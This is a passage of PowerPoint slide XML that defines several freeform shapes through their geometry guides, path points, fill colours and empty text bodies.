              <a:gd name="T15" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 34"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T39" fmla="*/ 0 h 34"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T41" fmla="*/ 0 h 34"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T43" fmla="*/ 0 h 34"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T45" fmla="*/ 0 h 34"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T47" fmla="*/ 0 h 34"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T49" fmla="*/ 0 h 34"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 3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34"/>
              <a:gd name="T80" fmla="*/ 7 w 7"/>
              <a:gd name="T81" fmla="*/ 34 h 3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34">
                <a:moveTo>
                  <a:pt x="3" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10436" name="Freeform 517"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3067050" y="6334125"/>
            <a:ext cx="52387" cy="206375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T26" fmla="*/ 0 w 23"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T28" fmla="*/ 0 w 23"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T35" fmla="*/ 0 h 91"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 23"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 9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
              <a:gd name="T58" fmla="*/ 0 h 91"/>
              <a:gd name="T59" fmla="*/ 23 w 23"/>
              <a:gd name="T60" fmla="*/ 91 h 9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 h="91">
                <a:moveTo>
                  <a:pt x="23" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="59B2FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10437" name="Freeform 518"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3070225" y="6350000"/>
            <a:ext cx="42862" cy="174625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T1" fmla="*/ 0 h 77"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T26" fmla="*/ 0 w 19"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T28" fmla="*/ 0 w 19"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T30" fmla="*/ 0 w 19"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 77"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T35" fmla="*/ 0 h 77"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T37" fmla="*/ 0 h 7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77"/>
              <a:gd name="T59" fmla="*/ 19 w 19"/>
              <a:gd name="T60" fmla="*/ 77 h 7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77">
                <a:moveTo>
                  <a:pt x="19" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="72C6FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10438" name="Freeform 519"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071812" y="6361113"/>
            <a:ext cx="33338" cy="147637"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T1" fmla="*/ 0 h 65"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T24" fmla="*/ 0 w 15"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T26" fmla="*/ 0 w 15"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T28" fmla="*/ 0 w 15"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T30" fmla="*/ 0 w 15"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T35" fmla="*/ 0 h 65"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T37" fmla="*/ 0 h 6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65"/>
              <a:gd name="T59" fmla="*/ 15 w 15"/>
              <a:gd name="T60" fmla="*/ 65 h 6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65">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="8CD8FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10439" name="Freeform 520"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071812" y="6375400"/>
            <a:ext cx="28575" cy="117475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T28" fmla="*/ 0 w 13"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 52"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T35" fmla="*/ 0 h 52"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 13"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 5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
              <a:gd name="T58" fmla="*/ 0 h 52"/>
              <a:gd name="T59" fmla="*/ 13 w 13"/>
              <a:gd name="T60" fmla="*/ 52 h 5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 h="52">
                <a:moveTo>
                  <a:pt x="13" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A5EDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10440" name="Freeform 521"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3073400" y="6391275"/>
            <a:ext cx="23812" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T1" fmla="*/ 0 h 38"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T3" fmla="*/ 0 h 38"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T26" fmla="*/ 0 w 10"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T28" fmla="*/ 0 w 10"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T30" fmla="*/ 0 w 10"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 38"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T35" fmla="*/ 0 h 38"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T37" fmla="*/ 0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
              <a:gd name="T58" fmla="*/ 0 h 38"/>
              <a:gd name="T59" fmla="*/ 10 w 10"/>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 h="38">
                <a:moveTo>
                  <a:pt x="10" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10441" name="Freeform 522"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2894012" y="6365875"/>
            <a:ext cx="101600" cy="125413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 45"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T8" fmla="*/ 0 w 45"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T10" fmla="*/ 0 w 45"/>
